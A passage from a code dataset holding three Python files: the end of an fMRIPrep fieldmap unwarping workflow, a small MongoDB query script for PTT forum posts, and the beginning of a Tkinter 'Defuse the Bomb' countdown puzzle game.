suffix='fmap_reg_vsm'), name='ds_reg_vsm')\n\n # Fieldmap to rads and then to voxels (VSM - voxel shift map)\n torads = pe.Node(niu.Function(function=_hz2rads), name='torads')\n\n gen_vsm = pe.Node(fsl.FUGUE(save_unmasked_shift=True), name='gen_vsm')\n # Convert the VSM into a DFM (displacements field map)\n # or: FUGUE shift to ANTS warping.\n vsm2dfm = pe.Node(itk.FUGUEvsm2ANTSwarp(), name='vsm2dfm')\n jac_dfm = pe.Node(CreateJacobianDeterminantImage(\n imageDimension=3, outputImage='jacobian.nii.gz'), name='jac_dfm')\n\n unwarp_reference = pe.Node(ANTSApplyTransformsRPT(dimension=3,\n generate_report=False,\n float=True,\n interpolation='LanczosWindowedSinc'),\n name='unwarp_reference')\n\n fieldmap_fov_mask = pe.Node(niu.Function(function=_fill_with_ones), name='fieldmap_fov_mask')\n\n fmap_fov2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n name='fmap_fov2ref_apply')\n\n apply_fov_mask = pe.Node(fsl.ApplyMask(), name=\"apply_fov_mask\")\n\n ref_msk_post = pe.Node(ComputeEPIMask(generate_report=True, dilation=1),\n name='ref_msk_post')\n\n workflow.connect([\n (inputnode, meta, [('name_source', 'in_file')]),\n (inputnode, explicit_mask_epi, [('in_reference', 'in_file'),\n ('in_mask', 'mask_file')]),\n (inputnode, fmap2ref_reg, [('fmap_ref', 'moving_image')]),\n (inputnode, fmap2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, fmap_mask2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_mask2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, ds_reg_vsm, [('name_source', 'source_file')]),\n (fmap2ref_apply, ds_reg_vsm, [('out_report', 'in_file')]),\n (explicit_mask_epi, fmap2ref_reg, [('out_file', 'fixed_image')]),\n (inputnode, ds_reg, [('name_source', 'source_file')]),\n (fmap2ref_reg, ds_reg, [('out_report', 'in_file')]),\n (inputnode, fmap2ref_apply, [('fmap', 'input_image')]),\n (inputnode, fmap_mask2ref_apply, [('fmap_mask', 'input_image')]),\n (fmap2ref_apply, torads, [('output_image', 'in_file')]),\n (meta, gen_vsm, [(('out_dict', _get_ec), 'dwell_time'),\n (('out_dict', _get_pedir_fugue), 'unwarp_direction')]),\n (meta, vsm2dfm, [(('out_dict', _get_pedir_bids), 'pe_dir')]),\n (torads, gen_vsm, [('out', 'fmap_in_file')]),\n (vsm2dfm, unwarp_reference, [('out_file', 'transforms')]),\n (inputnode, unwarp_reference, [('in_reference', 'reference_image')]),\n (inputnode, unwarp_reference, [('in_reference', 'input_image')]),\n (vsm2dfm, outputnode, [('out_file', 'out_warp')]),\n (vsm2dfm, jac_dfm, [('out_file', 'deformationField')]),\n (inputnode, fieldmap_fov_mask, [('fmap_ref', 'in_file')]),\n (fieldmap_fov_mask, fmap_fov2ref_apply, [('out', 'input_image')]),\n (inputnode, fmap_fov2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_fov2ref_apply, [('composite_transform', 'transforms')]),\n (fmap_fov2ref_apply, apply_fov_mask, [('output_image', 'mask_file')]),\n (unwarp_reference, apply_fov_mask, [('output_image', 'in_file')]),\n (apply_fov_mask, ref_msk_post, [('out_file', 'in_file')]),\n (apply_fov_mask, outputnode, [('out_file', 'out_reference')]),\n (ref_msk_post, outputnode, [('mask_file', 'out_mask')]),\n (ref_msk_post, outputnode, [('out_report', 'out_mask_report')]),\n (jac_dfm, outputnode, [('jacobian_image', 'out_jacobian')]),\n ])\n\n if not settings.get('fmap_bspline', False):\n workflow.connect([\n (fmap_mask2ref_apply, gen_vsm, [('output_image', 'mask_file')])\n ])\n\n if settings.get('fmap-demean', True):\n # Demean within mask\n demean = pe.Node(niu.Function(function=_demean), name='demean')\n\n workflow.connect([\n (gen_vsm, demean, [('shift_out_file', 'in_file')]),\n (fmap_mask2ref_apply, demean, [('output_image', 'in_mask')]),\n (demean, vsm2dfm, [('out', 'in_file')]),\n ])\n\n else:\n workflow.connect([\n (gen_vsm, vsm2dfm, [('shift_out_file', 'in_file')]),\n ])\n\n return workflow\n\n# Helper functions\n# ------------------------------------------------------------\n\n\ndef _get_ec(in_dict):\n return float(in_dict['EffectiveEchoSpacing'])\n\n\ndef _get_pedir_bids(in_dict):\n return in_dict['PhaseEncodingDirection']\n\n\ndef _get_pedir_fugue(in_dict):\n return in_dict['PhaseEncodingDirection'].replace('i', 'x').replace('j', 'y').replace('k', 'z')\n\n\ndef _hz2rads(in_file, out_file=None):\n \"\"\"Transform a fieldmap in Hz into rad/s\"\"\"\n from math import pi\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n if out_file is None:\n out_file = genfname(in_file, 'rads')\n nii = nb.load(in_file)\n data = nii.get_data() * 2.0 * pi\n nb.Nifti1Image(data, nii.get_affine(),\n nii.get_header()).to_filename(out_file)\n return out_file\n\n\ndef _demean(in_file, in_mask, out_file=None):\n import numpy as np\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n\n if out_file is None:\n out_file = genfname(in_file, 'demeaned')\n nii = nb.load(in_file)\n msk = nb.load(in_mask).get_data()\n data = nii.get_data()\n data -= np.median(data[msk > 0])\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(\n out_file)\n return out_file\n\n\ndef _fill_with_ones(in_file):\n import nibabel as nb\n import numpy as np\n import os\n\n nii = nb.load(in_file)\n data = np.ones(nii.shape)\n\n out_name = os.path.abspath(\"out.nii.gz\")\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_name)\n\n return out_name\n","sub_path":"fmriprep/workflows/fieldmap/unwarp.py","file_name":"unwarp.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"262115677","text":"import pymongo\nfrom pymongo import MongoClient\n\ndef main():\n\t# parseAuthor('OtsukaAi')\n\t#queryUser('OtsukaAi', 'myhome6206')\n\tqueryUser('Gossiping', 'blza')\n\ndef queryUser(board, username):\n\tclient = MongoClient('localhost', 27017)\n\tcollection = client['Ptt']['Weekarticle' + board]\n\n\tuser_record = collection.find({\n\t\t'$or':[\n\t\t\t{'author.account': username},\n\t\t\t{'messages':{\n\t\t\t\t\t'$elemMatch':{'push_userid': username}\n\t\t\t}}\n\t\t]\n\t}).sort('date', pymongo.DESCENDING)\n\treturn user_record\n\n\t#for record in user_record:\n\t#\tprint record['article_title'], record['date']\n\nif __name__ == '__main__':\n\tmain()","sub_path":"web/Pttuser.py","file_name":"Pttuser.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"8803037","text":"# \"Bomb_Game\" By: Alston Sanford\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Import Modules, Create Initial Canvas, and Begin Initial Code\n# ----------------------------------------------------------------------------------------------------------------------\n\nfrom Tkinter import *\n# import os\nimport time\nimport webbrowser\n# import math\n# import random\nimport pickle\nimport anydbm\nimport background_premade_code\n\n\nclass ANSI:\n RED = '\\033[91m'\n END = '\\033[0m'\n\nmain_canvas = Tk()\nmain_canvas.title(\"Defuse the Bomb!\")\ngame_window = Canvas(main_canvas, width=1080, height=680, bg=\"black\")\ngame_window.grid(row=0, columnspan=4)\n\nsaw = PhotoImage(file='images/bomb_game_images/saw.gif')\nwires = PhotoImage(file='images/bomb_game_images/ibg_1080x720.gif')\nexplode = PhotoImage(file='images/bomb_game_images/explosion.gif')\ndefused = PhotoImage(file='images/bomb_game_images/defused.gif')\nwin_screen = PhotoImage(file='images/bomb_game_images/win_screen.gif')\ngame_over = PhotoImage(file='images/bomb_game_images/game_over.gif')\n\ncountdown_stopped = False\nout_of_time = False\nerror = False\n\nglobal increment\nincrement = 1\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Create commands\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef countdown(n):\n start_button.destroy()\n if n == 90:\n global t0\n t0 = time.clock()\n game_window.bind(\"\", cut_wire) # enable clicking on game_window\n pause_button.config(state=NORMAL, cursor='wait')\n hint_button.config(state=NORMAL, cursor='question_arrow')\n status_box.delete(0, END)\n status_box.insert(0, \"ARMED\")\n status_box.config(bg='red')\n hint_box.delete(0, END)\n hint_box.insert(0, 'Caboose')\n game_window.create_image(0, 0, image=wires, anchor=NW)\n global out_of_time\n if out_of_time:\n return\n global countdown_stopped\n if countdown_stopped:\n timer_box.delete(0, END)\n timer_box.insert(0, '')\n countdown_stopped = False # Update this for the next bomb\n pause_button.config(state=DISABLED)\n hint_button.config(state=DISABLED)\n status_box.delete(0, END)\n status_box.insert(0, 'DISARMED')\n status_box.config(bg='green')\n return\n if n < 0:\n lose()\n return\n else:\n timer_box.delete(0, END)\n timer_box.insert(0, n) # keep the countdown going\n main_canvas.after(1000, countdown, n-increment) # wait one second, then continue countdown.\n global error\n if error:\n timer_box.delete(0, END)\n timer_box.insert(0, 'ERROR')\n timer_box.config(bg='black', fg='red')\n\n\ndef hint():\n global hints_remaining\n if hints_remaining == 2:\n hints_remaining -= 1\n hints_remaining_box.delete(0, END)\n hints_remaining_box.insert(0, hints_remaining)\n hint_box.delete(0, END)\n hint_box.insert(0, 'Take this and the story ends')\n else:\n hint_button.config(state=DISABLED, cursor='arrow')\n hints_remaining_box.delete(0, END)\n hints_remaining_box.insert(0, \"YOU'RE OUT!\")\n hint_box.delete(0, END)\n hint_box.insert(0, 'Eiffel 65')\n\n\ndef trap():\n global increment\n increment = 10\n pause_button.config(state=DISABLED, cursor='arrow')\n hint_button.config(state=DISABLED, cursor='arrow')\n hints_remaining_box.delete(0, END)\n hints_remaining_box.insert(0, 'DEATH IS COMING')\n hint_box.delete(0, END)\n hint_box.insert(0, 'BOOBY TRAP ACTIVATED')\n\n\ndef lose(): # LOSE\n game_window.unbind(\"